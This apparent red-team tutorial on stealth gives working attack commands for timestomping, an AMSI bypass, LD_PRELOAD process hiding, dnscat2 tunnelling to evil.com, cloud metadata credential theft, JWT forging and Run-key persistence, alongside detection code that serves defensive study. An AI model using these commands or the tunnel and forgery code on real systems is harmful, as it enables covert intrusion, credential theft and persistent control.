Mastering Stealth Techniques in Offensive Security

Introduction:

Stealth is a critical component of offensive security, enabling penetration testers and red teams to operate undetected in target environments. Advanced evasion techniques, coupled with the right tools and configurations, can make the difference between a successful engagement and early detection. This article explores key stealth methodologies, verified commands, and best practices for maintaining persistence while avoiding defensive mechanisms.

Learning Objectives:

  • Understand key stealth techniques used in offensive security.
  • Learn verified Linux/Windows commands for evasion and persistence.
  • Explore advanced tool configurations to bypass detection.

1. Evading Timeline Analysis with Timestomping

Verified Command (Windows – PowerShell):

(Get-Item "C:\target\file.exe").CreationTime = "01/01/2020 00:00:00"

Step-by-Step Guide:

Timestomping rewrites file timestamps so a dropped file blends in with the legitimate files around it and does not stand out in a forensic timeline. It does not touch logs; what it defeats is sorting by time.

1. Open PowerShell (Administrator rights are only needed if the target file's ACL requires them).

2. Use `Get-Item` to locate the target file.

3. Set `CreationTime`, `LastAccessTime` and `LastWriteTime` to match neighbouring files in the same directory.

Caveat: this API path only rewrites the $STANDARD_INFORMATION timestamps in the file's NTFS MFT record; the $FILE_NAME timestamps are left alone, and a mismatch between the two is the classic timestomping indicator. Sysmon also records the change as Event ID 2 (file creation time changed), and the USN journal keeps its own record of the write.
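
The same stomp-and-check cycle on Linux, as an added example that is not part of the original article (its own command is PowerShell): os.utime() plays the role of the CreationTime/LastWriteTime assignment, and the check exploits the one timestamp the attacker cannot set through that call. The file names and the year of backdating are constructed for the demo.

```python
import os
import tempfile
import time
from pathlib import Path


def timestomp(path, reference):
    """Copy atime and mtime from `reference` onto `path`.

    os.utime() is the POSIX counterpart of setting LastAccessTime /
    LastWriteTime from PowerShell; Linux has no user-settable creation time.
    """
    st = os.stat(reference)
    os.utime(path, ns=(st.st_atime_ns, st.st_mtime_ns))


def suspicious_timestamps(path, tolerance=2.0):
    """Return True when mtime is older than ctime by more than `tolerance` seconds.

    The kernel bumps ctime (inode change time) on the utime() call itself and
    offers no API to set it, so a stomped file carries an mtime that is far
    behind its own ctime. This is the Linux analogue of the NTFS
    $STANDARD_INFORMATION vs $FILE_NAME mismatch. Legitimate operations
    (cp -p, tar -p, chmod on an old file) produce the same pattern, so treat a
    hit as a lead for review, not as proof.
    """
    st = os.stat(path)
    return (st.st_ctime - st.st_mtime) > tolerance


def demo():
    """Run the attack and the check in a scratch directory; returns the check
    result before and after stomping."""
    with tempfile.TemporaryDirectory() as d:
        # Constructed "legitimate" neighbour, backdated by a year.
        legit = Path(d) / "legit.bin"
        legit.write_bytes(b"old")
        year_ago = time.time() - 365 * 86400
        os.utime(legit, (year_ago, year_ago))

        # Freshly dropped payload (constructed), then made to look as old as legit.bin.
        payload = Path(d) / "payload.bin"
        payload.write_bytes(b"new")
        before = suspicious_timestamps(payload)   # mtime ~= ctime -> False
        timestomp(payload, legit)
        after = suspicious_timestamps(payload)    # mtime a year behind ctime -> True
        return before, after


if __name__ == "__main__":
    print(demo())  # (False, True)
```

The check is the one a triage script can run across a whole directory tree; the files it flags are then compared against the USN journal or $FILE_NAME data on Windows, or against package-manager manifests on Linux, to separate stomped files from `cp -p` copies.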

2. Bypassing AMSI in PowerShell

Verified Command (PowerShell):

[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)

Step-by-Step Guide:

The Antimalware Scan Interface (AMSI) hands script content to the installed AV engine (Windows Defender by default) before PowerShell runs it. The one-liner uses reflection to set the non-public static field `amsiInitFailed` to `$true`, so PowerShell behaves as though AMSI initialisation failed and stops submitting content for scanning. It does not disable Defender; it blinds AMSI inside the current PowerShell process only.

1. Execute the command in the PowerShell session you intend to use.

2. Test with a script that is normally flagged to confirm that session is no longer being scanned.

3. Warning: the literal string above is itself signatured by Defender on patched systems and is blocked before it runs, so real engagements obfuscate it (string concatenation, wildcard reflection over the type and field names). Even when the bypass works, PowerShell script block logging (Event ID 4104) still records the command, and EDR products hook the AMSI-related activity.
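
The defender-side counterpart, as an added example that is not from the article: a small classifier for the ScriptBlockText of PowerShell 4104 events that catches the bypass above, its string-concatenated form, and the wildcard-reflection variant that never spells out AmsiUtils at all. The log lines are constructed, and the indicator list and patterns are this example's own choices, not a vendor signature set.

```python
import re

# Constructed sample of ScriptBlockText values as they would appear in
# PowerShell event 4104 (Microsoft-Windows-PowerShell/Operational). Not real telemetry.
SAMPLE_4104 = [
    "Get-ChildItem C:\\Users | Sort-Object LastWriteTime",
    "[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils')"
    ".GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)",
    "[Ref].Assembly.GetType('System.Management.Automation.'+'Amsi'+'Utils')"
    ".GetField('amsi'+'InitFailed','NonPublic,Static').SetValue($null,$true)",
    "$a=[Ref].Assembly.GetTypes();ForEach($b in $a){if($b.Name -like '*iUtils'){$c=$b}};"
    "$d=$c.GetFields('NonPublic,Static');ForEach($e in $d){if($e.Name -like '*InitFailed'){$f=$e}};"
    "$f.SetValue($null,$true)",
    "Write-Host 'the word amsi alone is not an indicator'",
]

# Literal indicators, matched after normalisation.
INDICATORS = ["amsiutils", "amsiinitfailed", "amsiscanbuffer", "amsicontext", "amsi.dll"]

# Wildcard reflection never spells the names out, so match the shape instead:
# enumerating non-public static fields, or -like filters ending in the tell-tale suffixes.
WILDCARD = re.compile(
    r"""getfields\s*\(\s*['"]nonpublic,static['"]\s*\)|-like\s*['"]\*i?utils['"]|-like\s*['"]\*initfailed['"]""",
    re.IGNORECASE,
)


def normalize(script):
    """Undo the cheapest obfuscations before matching: backtick escapes,
    string concatenation ('Amsi'+'Utils'), whitespace and case."""
    s = script.replace("`", "")
    s = re.sub(r"""['"]\s*\+\s*['"]""", "", s)
    s = re.sub(r"\s+", "", s)
    return s.lower()


def classify(script):
    """Return the list of indicators that fire for one script block."""
    text = normalize(script)
    hits = [ind for ind in INDICATORS if ind in text]
    if WILDCARD.search(script):
        hits.append("wildcard-reflection")
    return hits


def scan(blocks):
    """Map each offending block index to its indicators; clean blocks are omitted."""
    return {i: classify(b) for i, b in enumerate(blocks) if classify(b)}


if __name__ == "__main__":
    for i, hits in scan(SAMPLE_4104).items():
        print(f"block {i}: {hits}")
```

The normalisation step is what makes the difference in practice: the concatenated form defeats a plain substring match, and the wildcard form defeats normalisation too, which is why the shape-based pattern is there as a second layer. Heavier obfuscation (encoded commands, Invoke-Expression over decoded strings) needs the decoded 4104 block, which PowerShell logs separately.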

3. Linux Process Hiding with LD_PRELOAD

Verified Command (Linux):

gcc -shared -fPIC -o libprocesshider.so processhider.c && export LD_PRELOAD=/path/to/libprocesshider.so

Step-by-Step Guide:

This technique hides a process from ps, top and similar tools. Those tools enumerate /proc with readdir(), so a shared library that wraps readdir()/readdir64() and drops the entry for the target PID or process name makes the process vanish from their output. The hook therefore has to be loaded into the viewing tools, not into the process being hidden.

1. Write a C program (processhider.c) that hooks `readdir`/`readdir64` and filters the /proc entries it wants to hide.

2. Compile it into a shared library (`libprocesshider.so`).

3. Load it with `LD_PRELOAD`. Exporting the variable, as above, only affects commands started from that shell; for a system-wide effect attackers write the library path to `/etc/ld.so.preload`, which the dynamic loader applies to every dynamically linked binary.

Caveat: the hook does nothing for statically linked binaries, for tools that stat /proc/<pid> directly instead of listing the directory, or for a shell that was started without the preload. A non-empty `/etc/ld.so.preload`, an unexpected `LD_PRELOAD` in a process environment, and a mismatch between `ps` output and a brute-force walk of /proc/<pid> are the standard detection checks.
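
Detection for this technique, as an added Python example that is not from the article and is not the hider itself: it compares what readdir() reports with what a brute-force stat() of /proc/<pid> finds, which is exactly the gap a readdir-only hook leaves open, and lists the preload indicators alongside. It assumes Linux with /proc mounted.

```python
import os


def listed_pids():
    """PIDs as ps/top (and os.listdir) see them: through readdir() on /proc,
    the libc call an LD_PRELOAD process hider wraps."""
    return {int(name) for name in os.listdir("/proc") if name.isdigit()}


def _is_process(pid):
    """True for a thread-group leader, i.e. a real process. Threads also have
    /proc/<tid>/ entries that readdir() hides by design, so without this filter
    every multithreaded process would produce false hits."""
    try:
        with open(f"/proc/{pid}/status") as f:
            for line in f:
                if line.startswith("Tgid:"):
                    return int(line.split()[1]) == pid
    except OSError:        # vanished between exists() and open(), or hidepid in effect
        return False
    return False


def probed_pids(max_pid=None):
    """PIDs found by stat()'ing /proc/<n> for every n up to max_pid.

    A hider that only filters directory listings still answers stat() for the
    entry it hides, so the brute-force walk (unhide's 'brute' test does the
    same) sees what readdir() no longer reports. Defaults to kernel.pid_max,
    which can be in the millions and take several seconds to scan.
    """
    if max_pid is None:
        with open("/proc/sys/kernel/pid_max") as f:
            max_pid = int(f.read())
    return {pid for pid in range(1, max_pid + 1)
            if os.path.exists(f"/proc/{pid}") and _is_process(pid)}


def hidden_pids(max_pid=None):
    """PIDs that exist but appeared in neither of two directory listings taken
    immediately before and after the probe (the two listings absorb processes
    that legitimately start or exit while we scan)."""
    before = listed_pids()
    probed = probed_pids(max_pid)
    after = listed_pids()
    return probed - (before | after)


def preload_indicators():
    """The cheap checks that go with the PID comparison: an LD_PRELOAD in our
    own environment and any entry in /etc/ld.so.preload."""
    hits = []
    if os.environ.get("LD_PRELOAD"):
        hits.append("LD_PRELOAD=" + os.environ["LD_PRELOAD"])
    if os.path.isfile("/etc/ld.so.preload"):
        with open("/etc/ld.so.preload") as f:
            hits.extend("/etc/ld.so.preload: " + line.strip()
                        for line in f if line.strip())
    return hits


if __name__ == "__main__":
    print("hidden:", sorted(hidden_pids()))
    print("preload indicators:", preload_indicators())
```

A hider that also wraps stat(), open() and fopen() defeats the walk, and a kernel-level rootkit defeats anything run from userland; at that point the comparison has to come from a statically linked binary or from outside the host (for example a memory image), which is why the /etc/ld.so.preload check is worth keeping even though it is trivial.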

4. DNS Tunneling for C2 Evasion

Verified Command (dnscat2 – Attacker Setup):

sudo ruby dnscat2.rb --dns domain=evil.com --secret=MySecretKey

Step-by-Step Guide:

DNS tunneling bypasses egress filters by encoding data into the labels of DNS queries and into the answers the attacker's authoritative server returns. The target never opens a direct connection to the C2; its local resolver does the forwarding, which is why the channel survives networks that block everything except DNS.

1. Register a domain (evil.com in this example) and create NS records delegating it, or a subdomain of it, to the attacker's server, which must be reachable on UDP/53.

2. Run the dnscat2 server on the attacker machine (above). The `--secret` value authenticates and encrypts the session, so a defender who captures the traffic cannot simply read or replay it.

3. Run the client on the target with the same secret, for example `./dnscat --secret=MySecretKey evil.com`, to establish the covert channel.

Caveat: the channel is slow (a few hundred bytes per query) and noisy. Defenders spot it by the volume of queries to a single domain, by unusually long or high-entropy labels, and by the TXT/CNAME/MX record types it leans on, so keep request rates low and expect the domain to be burned once it is noticed.
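
What the client and server are doing on the wire, as an added example rather than dnscat2's own protocol (which adds session IDs, encryption with the --secret and retransmission on top of this): a minimal encoder that packs payload bytes into query names under evil.com, the matching decoder, and the kind of per-name heuristic a defender applies to such names. The payload and the zone name are assumptions for the demo.

```python
import base64
import math

DOMAIN = "evil.com"   # the article's attacker-controlled zone; assumed delegated by NS records
MAX_LABEL = 63        # RFC 1035 label limit
MAX_NAME = 253        # longest name a resolver will carry


def encode_chunk(seq, data, domain=DOMAIN):
    """One payload chunk -> one query name: s<seq>.<base32 labels>.<domain>.

    Base32 is used because DNS names are case-insensitive and limited to
    letters, digits and hyphens, which rules out base64.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + MAX_LABEL] for i in range(0, len(b32), MAX_LABEL)]
    name = ".".join([f"s{seq}", *labels, domain])
    if len(name) > MAX_NAME:
        raise ValueError(f"chunk {seq} does not fit in one query name")
    return name


def decode_chunk(name, domain=DOMAIN):
    """Server side: strip the zone, rejoin the labels, restore padding, decode."""
    labels = name[: -(len(domain) + 1)].split(".")
    seq = int(labels[0][1:])
    b32 = "".join(labels[1:]).upper()
    b32 += "=" * (-len(b32) % 8)
    return seq, base64.b32decode(b32)


def encode(data, chunk_size=100, domain=DOMAIN):
    """Split a payload into sequenced query names (100 bytes -> 160 base32
    characters -> three labels, well under the 253-byte limit)."""
    chunks = [data[i:i + chunk_size] for i in range(0, len(data), chunk_size)]
    return [encode_chunk(seq, chunk, domain) for seq, chunk in enumerate(chunks)]


def decode(names, domain=DOMAIN):
    """Reassemble in sequence order; a real tunnel also needs retransmission
    because resolvers drop and reorder queries."""
    parts = dict(decode_chunk(n, domain) for n in names)
    return b"".join(parts[seq] for seq in sorted(parts))


def entropy(s):
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def looks_like_tunnel(name, zone_labels=2):
    """Defender-side heuristic for a single name: a label near the 63-byte
    limit, or a long high-entropy subdomain. Some CDN and anti-spam lookups
    look similar, so in practice this is combined with per-domain query volume
    and the record types requested (TXT, CNAME, MX) rather than used alone."""
    sub = name.split(".")[:-zone_labels]
    if not sub:
        return False
    joined = "".join(sub)
    return max(len(l) for l in sub) >= 40 or (len(joined) >= 30 and entropy(joined) > 3.5)


if __name__ == "__main__":
    names = encode(b"id=1001;user=svc_backup;host=web01")   # constructed beacon data
    print(names[0])
    print(decode(names))
```

The encoder shows where the bandwidth goes: base32 costs 60 percent overhead, each name carries at most about 150 payload bytes, and every query is a separate round trip through the victim's resolver, which is why tunnels are slow and why query volume per domain is the strongest signal on the defensive side.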

5. Cloud Instance Metadata Exploitation (AWS/Azure)

Verified Command (AWS IMDSv1):

curl http://169.254.169.254/latest/meta-data/iam/security-credentials/

Step-by-Step Guide:

Cloud metadata services hand out the credentials of the role attached to an instance. With IMDSv1 any process on the instance, or anything that can make the instance issue a request on its behalf (an SSRF bug in a web app is the usual case), can read them with a plain GET.

1. From a compromised instance, query the endpoint above. If IMDSv1 is still enabled it returns the name of the attached role; append that name to the same path to retrieve the temporary AccessKeyId, SecretAccessKey and Token.

2. Use the temporary keys from outside the instance with the AWS CLI or an SDK. What they allow is whatever the instance role allows, which is where the privilege escalation comes from.

3. Mitigation: enforce IMDSv2, which requires a session token obtained with a PUT to `/latest/api/token` (with an `X-aws-ec2-metadata-token-ttl-seconds` header) and sent as `X-aws-ec2-metadata-token` on every subsequent request; a bare GET then gets a 401. Set it per instance with `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1`; the hop limit of 1 stops containers behind a bridge network from obtaining tokens. Azure's IMDS sits on the same address but already refuses requests that lack the `Metadata: true` header, so the SSRF variant needs header control there.
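
The IMDSv1 and IMDSv2 exchanges side by side, as an added example that is not from the article: a loopback stand-in for 169.254.169.254 that can be switched between accepting bare GETs and requiring a session token, plus the two client flows against it. The role name, credential values and token are constructed fakes; the paths and header names are the real ones.

```python
import json
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed values: a fake role name, fake temporary credentials and a fake
# session token. The real service lives at 169.254.169.254; this stand-in
# binds to a loopback port so the exchange runs offline.
ROLE = "ec2-web-role"
FAKE_CREDS = {"AccessKeyId": "ASIAEXAMPLE000000000",
              "SecretAccessKey": "fake-secret", "Token": "fake-session-token"}
TOKEN = "AQAEA-fake-imdsv2-session-token"
CRED_PATH = "/latest/meta-data/iam/security-credentials/"


class Imds(BaseHTTPRequestHandler):
    tokens_required = True   # mirrors --http-tokens required (IMDSv2 only)

    def log_message(self, *args):   # keep the demo quiet
        pass

    def do_PUT(self):
        # IMDSv2 session start: PUT /latest/api/token with a TTL header.
        if self.path == "/latest/api/token" and \
                "X-aws-ec2-metadata-token-ttl-seconds" in self.headers:
            self._reply(200, TOKEN)
        else:
            self._reply(400, "bad request")

    def do_GET(self):
        if self.tokens_required and self.headers.get("X-aws-ec2-metadata-token") != TOKEN:
            self._reply(401, "unauthorized")          # the bare curl dies here
            return
        if self.path == CRED_PATH:
            self._reply(200, ROLE)                     # step 1: role name
        elif self.path == CRED_PATH + ROLE:
            self._reply(200, json.dumps(FAKE_CREDS))   # step 2: the keys
        else:
            self._reply(404, "not found")

    def _reply(self, code, body):
        self.send_response(code)
        self.send_header("Content-Type", "text/plain")
        self.end_headers()
        self.wfile.write(body.encode())


def start_server(tokens_required=True):
    """Start the stand-in on a free loopback port; returns (server, base_url)."""
    Imds.tokens_required = tokens_required
    srv = HTTPServer(("127.0.0.1", 0), Imds)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


# Ignore any proxy settings in the environment: the real IMDS is link-local too.
_opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def fetch_v1(base):
    """The article's curl: a bare GET with no token. Returns (status, body)."""
    try:
        with _opener.open(base + CRED_PATH) as r:
            return r.status, r.read().decode()
    except urllib.error.HTTPError as e:
        return e.code, e.reason


def fetch_v2(base):
    """IMDSv2 flow: PUT for a session token, then the two GETs carrying it."""
    req = urllib.request.Request(base + "/latest/api/token", method="PUT",
                                 headers={"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    with _opener.open(req) as r:
        token = r.read().decode()
    hdr = {"X-aws-ec2-metadata-token": token}
    with _opener.open(urllib.request.Request(base + CRED_PATH, headers=hdr)) as r:
        role = r.read().decode()
    with _opener.open(urllib.request.Request(base + CRED_PATH + role, headers=hdr)) as r:
        return json.loads(r.read().decode())


if __name__ == "__main__":
    for required in (False, True):
        srv, base = start_server(tokens_required=required)
        print(f"tokens_required={required}: v1 -> {fetch_v1(base)}, "
              f"v2 -> {fetch_v2(base)['AccessKeyId']}")
        srv.shutdown()
        srv.server_close()
```

The point the mock makes visible is that IMDSv2 is not about secrecy of the token but about the request shape: an SSRF primitive that can only issue GETs with attacker-chosen URLs cannot perform the PUT, and the hop-limit setting keeps the PUT response from reaching a container a hop away. A process that already runs on the host with the right network path still gets credentials either way, which is why the instance role itself should be least-privilege.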

6. API Security: JWT Token Manipulation

Verified Command (Python – PyJWT):

import jwt
token = jwt.encode({"user":"admin"}, "secret", algorithm="HS256")

Step-by-Step Guide:

A JWT is only as trustworthy as the signature check behind it. Attackers forge tokens to escalate privileges when the signing key is guessable, or when the server lets the token's own header decide how it should be verified.

1. Capture a JWT from a web request (Authorization header or cookie) and decode the header and payload; both are plain base64url, not encrypted, so the claims are readable as-is.

2. Use tools like `jwt_tool` or PyJWT to modify claims (for example `"user": "admin"` or a `"role"` claim).

3. Re-sign the token. If the HS256 secret is weak, recover it offline by guessing (jwt_tool's cracking mode or hashcat mode 16500) and sign with it as in the PyJWT snippet above. If the server honours `"alg": "none"`, strip the signature instead. Neither works against a server that pins the algorithm and uses a strong random key, which is the fix.
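
Forging and verifying HS256 tokens with the standard library only, as an added example that is not from the article and does not depend on PyJWT: it shows the weak-secret crack, the alg=none forgery, and the difference between a verifier that trusts the header and one that pins the algorithm. The secret, wordlist and claims are assumed values.

```python
import base64
import hashlib
import hmac
import json


def b64url(raw):
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _segment(obj):
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(payload, key):
    """Standard HS256 token: base64url(header).base64url(payload).base64url(HMAC)."""
    header = _segment({"alg": "HS256", "typ": "JWT"})
    body = _segment(payload)
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"


def forge_none(payload):
    """alg=none forgery: an empty signature that only a header-trusting verifier accepts."""
    return f"{_segment({'alg': 'none', 'typ': 'JWT'})}.{_segment(payload)}."


def crack_hs256(token, candidates):
    """Offline weak-secret guess: re-sign the captured header.payload with each
    candidate and compare (what jwt_tool's crack mode and hashcat -m 16500 do)."""
    header, body, sig = token.split(".")
    target = b64url_decode(sig)
    signing_input = f"{header}.{body}".encode()
    for cand in candidates:
        if hmac.compare_digest(hmac.new(cand, signing_input, hashlib.sha256).digest(), target):
            return cand
    return None


def verify_naive(token, key):
    """The bug: the token's own header decides how it is verified."""
    header, body, sig = token.split(".")
    alg = json.loads(b64url_decode(header)).get("alg")
    if alg == "none":
        return json.loads(b64url_decode(body))       # no signature check at all
    if alg == "HS256":
        expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(sig)):
            return json.loads(b64url_decode(body))
    raise ValueError("bad signature")


def verify_strict(token, key):
    """The fix: the server pins HS256 and ignores whatever the header claims."""
    header, body, sig = token.split(".")
    if json.loads(b64url_decode(header)).get("alg") != "HS256":
        raise ValueError("unexpected alg")
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        raise ValueError("bad signature")
    return json.loads(b64url_decode(body))


if __name__ == "__main__":
    # Constructed: the server's (weak) key and a captured low-privilege token.
    server_key = b"secret"
    captured = sign_hs256({"user": "guest"}, server_key)
    recovered = crack_hs256(captured, [b"password", b"123456", b"secret"])
    forged = sign_hs256({"user": "admin"}, recovered)
    print("cracked key:", recovered, "->", verify_strict(forged, server_key))
    print("alg=none vs naive verifier:", verify_naive(forge_none({"user": "admin"}), server_key))
```

Note that the strict verifier still accepts the token forged with the cracked key: pinning the algorithm closes the `none` hole, but only a key that cannot be brute-forced (32 or more random bytes for HS256) or a switch to an asymmetric algorithm with the private key kept off the API servers closes the other one.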

7. Windows Persistence via Registry

Verified Command (cmd):

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v Backdoor /t REG_SZ /d "C:\malware.exe"

Step-by-Step Guide:

This adds an executable to the current user's Run key, so Windows launches it every time that user logs on.

1. Open Command Prompt. The HKCU Run key is writable by the user, so no Administrator rights are needed; the HKLM equivalent (`HKLM\Software\Microsoft\Windows\CurrentVersion\Run`) fires for every user but does require them.

2. Use `reg add` to create the autorun value. Pick a value name and payload path that resemble legitimate software; "Backdoor" and `C:\malware.exe` are placeholders, not something to use on an engagement.

3. Ensure the payload is placed in a location that survives reboots and cleanup, and that the user account has execute rights to it.

Caveat: Run keys are the first place defenders look. Sysmon Event ID 13 (registry value set) on these keys, Autoruns and most EDRs alert on new entries, so this is loud compared with the techniques above.

What Undercode Say:

  • Key Takeaway 1: Stealth requires a deep understanding of system internals and defensive mechanisms.
  • Key Takeaway 2: Combining multiple evasion techniques (e.g., timestomping + AMSI bypass) increases success rates.

Analysis:

Modern detection systems (EDR/XDR) are evolving, making stealth more challenging. However, low-level techniques (e.g., direct syscalls, memory-only payloads) remain effective. Future offensive security will likely focus on AI-driven evasion and adversarial machine learning to bypass next-gen defenses.

Prediction:

As enterprises adopt AI-powered security tools, red teams will increasingly leverage AI to automate evasion, creating an arms race between attackers and defenders. Organizations must prioritize threat hunting and anomaly detection to counter advanced stealth tactics.

Reported By: Daniel Scheidt – Hackers Feeds